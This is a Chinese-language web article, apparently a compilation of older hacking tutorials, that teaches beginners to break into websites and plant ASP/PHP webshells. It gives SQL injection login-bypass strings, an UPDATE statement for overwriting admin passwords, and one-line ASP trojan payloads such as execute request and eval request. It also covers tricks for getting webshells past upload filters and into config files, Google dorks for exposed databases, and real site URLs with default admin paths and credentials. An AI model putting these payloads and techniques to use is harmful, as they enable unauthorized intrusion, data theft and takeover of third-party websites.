亲宝软件园·资讯

展开

脚本入侵 非常不错的脚本入侵基础知识总结

人气:0
想了解非常不错的脚本入侵基础知识总结的相关内容吗,在本文为您仔细讲解脚本入侵的相关知识和一些Code实例,欢迎阅读和指正,我们先划重点:脚本入侵,基础知识,下面大家一起来学习吧。
一.Webshell是什么?这是很多朋友在疑惑的问题,
什么是webshell?今天我们就讲讲这个话题!

webshell是web入侵的脚本攻击工具。

简单的说来,webshell就是一个asp或php木马后门,黑客在入侵了一个网站后,常常在将这些 asp或php木马后门文件放置在网站服务器的web目录中,与正常的网页文件混在一起。然后黑客就可以用web的方式,通过asp或php木马后门控制网站服务器,包括上传下载文件、查看数据库、执行任意程序命令等。</P>

为了更好理解webshell我们学习两个概念:

什么是“木马”?“木马”全称是“特洛伊木马(Trojan<BR>Horse)”,原指古希腊士兵藏在木马内进入敌方城市从而占领敌方城市的故事。在Internet上,“特洛伊木马”指一些程序设计人员在其可从网络上下载 (Download)的应用程序或游戏中,包含了可以控制用户的计算机系统的程序,可能造成用户的系统被破坏甚至瘫痪。

什么是后门?大家都知道,一台计算机上有65535个端口,那么如果把计算机看作是一间屋子,那么这65535个端口就可以它看做是计算机为了与外界连接所开的65535 扇门。每个门的背后都是一个服务。有的门是主人特地打开迎接客人的(提供服务),有的门是主人为了出去访问客人而开设的(访问远程服务)——理论上,剩下的其他门都该是关闭着的,但偏偏由于各种原因,很多门都是开启的。于是就有好事者进入,主人的隐私被刺探,生活被打扰,甚至屋里的东西也被搞得一片狼迹。这扇悄然被开启的门——就是“后门”。

webshell的优点

webshell 最大的优点就是可以穿越防火墙,由于与被控制的服务器或远程主机交换的数据都是通过80端口传递的,因此不会被防火墙拦截。并且使用webshell一般不会在系统日志中留下记录,只会在网站的web日志中留下一些数据提交记录,没有经验的管理员是很难看出入侵痕迹的。

如何寻找webshel:

1,脚本攻击SQL注入<BR>

2,使用注入工具<BR>

3,在浏览器里打开百度,输入搜索关键词"在本页操作不需要FSO支持&"或者"一次只能执行一个操作",然后点击搜索,很快就可以看到检索到了大量的查询结果.<BR>其他的东西,暂时不多说了,以后再深入吧,每天准备一个话题,需要的是巨大的毅力和努力,我们举办的每日讲座就是为了通俗容易懂的普及信息安全知识,让不喜欢看文章,觉得信息安全知识很深奥枯燥的人都明白,其实他只要花很少时间,就可以了解很多信息安全知识!

二.菜鸟学习入侵的14种可利用方法 

作者:佚名 文章来源:本站原创 点击数:560 更新时间:2006-8-9 

1.上传漏洞[不多讲] 

pS: 如果看到:选择你要上传的文件 [重新上传]或者出现“请登陆后使用”,80%就有漏洞了! 

  有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传. 

2.注入漏洞[不多讲] 

pS:对MD5密码.有时我们不是哪么容易跑出来.如果是[SQL数据库].那么我们可以用以下命令: 

http://注入网址;update admin set password='新MD5密码' where password='旧MD5密码'--  [admin为表名.] 

3.旁注,也就是跨站. 

我们入侵某站时可能这个站坚固的无懈可击,我们可以找下和这个站同一服务器的站点,然后在利用这个站点用提权,嗅探等方法来入侵我们 要入侵的站点。,在这里有个难点,就是一些服务器的绝对路径经过加密,这就看我们的本事了 

4.暴库:把二级目录中间的/换成%5c  

EY:http://www.scbzlx.com/test/test/test.asp?test=test&test=1 

如果你能看到:'E:\test\test\database\test.asa'不是一个有效的路径。 确定路径名称拼写是否正确,以及是否 连接到文件存放的服务器。 

这样的就是数据库了。下载时用FLASHGET换成.MDB格式的就行. 

5.'or'='or'这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有: 

'or''=' " or "a"="a  ') or ('a'='a  ") or ("a"="a  or 1=1--  ' or 'a'='a 

6.社会工程学。这个我们都知道吧。就是猜解。 

7.写入ASP格式数据库。就是一句话木马[<%execute request("value")%> ],常用在留言本. 

EY:http://www.scbzlx.com/book/book.asp[这个就是ASP格式的数据库],再写入一句话木马 

8.源码利用:一些网站用的都是网上下载的源码.有的站长很菜.什么也不改. 

EY:http://www.ahsdxy.ah.edu.cn/xiaoyoulu/index.asp  

这个站用的是:杰出校友录,源码我下过了, 

默认数据库/webshell路径:\database\liangu_data.mdb 后台管理:adm_login.asp 密码及用户名都是admin 

9.默认数据库/webshell路径利用:这样的网站很多/利人别人的WEBSHELL. 

/Databackup/dvbbs7.MDB 

/bbs/Databackup/dvbbs7.MDB 

/bbs/Data/dvbbs7.MDB 

/data/dvbbs7.mdb 

/bbs/diy.asp 

/diy.asp 

/bbs/cmd.asp 

/bbs/cmd.exe 

/bbs/s-u.exe 

/bbs/servu.exe 

工具:网站猎手 挖掘鸡 

EY:http://www.cl1999.com/bbs/Databackup/dvbbs7.MDB 

10.查看目录法:人一些网站可以断开目录,可以方问目录。 

EY:http://www.ujs168.com/shop/admin/ 

http://escolourfvl.com/babyfox/admin/%23bb%23dedsed2s/ 

这样我们可以找到数据库,下载不用我教吧 

11.工具溢出:.asp?NewsID=  /2j.asp?id=18  .asp?id=[这种方法可以取得大量的WEBSHELL] 

  

12.搜索引擎利用: 

(1).inurl:flasher_list.asp  默认数据库:database/flash.mdb  后台/manager/ 

(2).找网站的管理后台地址: 

site:xxxx.comintext:管理 

site:xxxx.comintitle:管理  <关键字很多,自已找> 

site:xxxx.cominurl:login 

(3).查找access的数据库,mssql、mysql的连接文件 

allinurl:bbsdata 

filetype:mdbinurl:database 

filetype:incconn 

inurl:datafiletype:mdb 

我主不做了。。自已做做吧。。 

13.COOKIE诈骗: 

把自己的ID修改成管理员的,MD5密码也修改成他的,用桂林老兵工具可以修改COOKIE。这个我就不多讲了 

14.利用常见的漏洞:如动网BBS 

可以先用:dvbbs权限提升工具,使自已成为前台管理员。 

THEN,运用:动网固顶贴工具,找个固顶贴,再取得COOKIES,这个要你自已做。我们可以用WSockExpert取得Cookies/NC包 

这个我就不做了,网上教程多的是,自已下个看看。 

工具:dvbbs权限提升工具  动网固顶贴工具 

15.还有一些老漏洞。如IIS3,4的查看源码,5的DELETE 

CGI,PHP的一些老洞,我就不说了啊。。太老了。没有什么大用途。

三.从后台得到webshell十大技巧大汇总

作者:出处:安全中国责任编辑: 原野 [ 2006-04-27 09:29 ]我们把常用的从后台得到webshell的方法进行了总结和归纳,大体情况有以下十大方面……

--------------------------------------------------------------------------------

  重点推荐:黑客入侵实例

  前 言 

  动网上传漏洞,相信大家拿下不少肉鸡吧。可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然天下,现在这种漏洞已经基本比较难见到了,不排除一些小网站仍然存在此漏洞。在拿站过程中,我们经常费了九牛两虎之力拿到管理员帐号和密码,并顺利进入了后台,虽然此时与拿到网站webshell还有一步之遥,但还是有许多新手因想不出合适的方法而被拒之门外。因此,我们把常用的从后台得到webshell的方法进行了总结和归纳,大体情况有以下十大方面。 

  注意:如何进入后台,不是本文讨论范围,其具体方法就不说了,靠大家去自己发挥。此文参考了前人的多方面的资料和信息,在此一并表示感谢。 

  一、直接上传获得webshell 

  这种对php和jsp的一些程序比较常见,MolyX BOARD就是其中一例,直接在心情图标管理上传.php类型,虽然没有提示,其实已经成功了,上传的文件url应该是http://forums/images/smiles/下,前一阵子的联众游戏站和网易的jsp系统漏洞就可以直接上传jsp文件。文件名是原来的文件名,bo-blog后台可以可以直接上传.php文件,上传的文件路径有提示。以及一年前十分流行的upfile.asp漏洞(动网5.0和6.0、早期的许多整站系统),因过滤上传文件不严,导致用户可以直接上传webshell到网站任意可写目录中,从而拿到网站的管理员控制权限。 

  二、添加修改上传类型 

  现在很多的脚本程序上传模块不是只允许上传合法文件类型,而大多数的系统是允许添加上传类型,bbsxp后台可以添加asa asP类型,ewebeditor的后台也可添加asa类型,通过修改后我们可以直接上传asa后缀的webshell了,还有一种情况是过滤了.asp,可以添加.aspasp的文件类型来上传获得webshell。php系统的后台,我们可以添加.php.g1f的上传类型,这是php的一个特性,最后的哪个只要不是已知的文件类型即可,php会将php.g1f作为.php来正常运行,从而也可成功拿到shell。LeadBbs3.14后台获得webshell方法是:在上传类型中增加asp ,注意,asp后面是有个空格的,然后在前台上传ASP马,当然也要在后面加个空格! 

  三、利用后台管理功能写入webshell 

  上传漏洞基本上补的也差不多了,所以我们进入后台后还可以通过修改相关文件来写入webshell。比较的典型的有dvbbs6.0,还有leadbbs2.88等,直接在后台修改配置文件,写入后缀是asp的文件。而LeadBbs3.14后台获得webshell另一方法是:添加一个新的友情链接,在网站名称处写上冰狐最小马即可,最小马前后要随便输入一些字符,http:\\网站\inc\IncHtm\BoardLink.asp就是我们想要的shell。 

  四、利用后台管理向配置文件写webshell 

  利用"""":""//"等符号构造最小马写入程序的配置文件,joekoe论坛,某某同学录,沸腾展望新闻系统,COCOON Counter统计程序等等,还有很多php程序都可以,COCOON Counter统计程序举例,在管理邮箱处添上cnhacker@263.net":eval request(chr (35))//, 在配制文件中就是webmail="cnhacker@263.net\":eval request(chr(35))//",还有一种方法就是写上 cnhacker@263.net"%><%eval request(chr(35))%><%',这样就会形成前后对应,最小马也就运行了。<%eval request(chr(35))%>可以用lake2的eval发送端以及最新的2006 客户端来连,需要说明的是数据库插马时候要选前者。再如动易2005,到文章中心管理-顶部菜单设置-菜单其它特效,插入一句话马"%><%execute request("l")%><%',保 存顶部栏目菜单参数设置成功后,我们就得到马地址http://网站/admin/rootclass_menu_config.asp。 

  五、利用后台数据库备份及恢复获得webshell 

  主要是利用后台对access数据库的“备份数据库”或“恢复数据库”功能,“备份的数据库路径”等变量没有过滤导致可以把任意文件后缀改 为asp,从而得到webshell,msssql版的程序就直接应用了access版的代码,导致sql版照样可以利用。还可以备份网站asp文件为其他后缀 如.txt文件,从而可以查看并获得网页源代码,并获得更多的程序信息增加获得webshell的机会。在实际运用中经常会碰到没有上传功能的时 候,但是有asp系统在运行,利用此方法来查看源代码来获得其数据库的位置,为数据库插马来创造机会,动网论坛就有一个ip地址的数据库,在后台的ip管理中可以插入最小马然后备份成.asp文件即可。在谈谈突破上传检测的方法,很多asp程序在即使改了后缀名后也会提示文件非法,通过在.asp文件头加上gif89a修改后缀为gif来骗过asp程序检测达到上传的目的,还有一种就是用记事本打开图片文件,随便粘贴一部分复制到asp木马文件头,修改gif后缀后上传也可以突破检测,然后备份为.asp文件,成功得到webshell。 

加载全部内容

相关教程
猜你喜欢
用户评论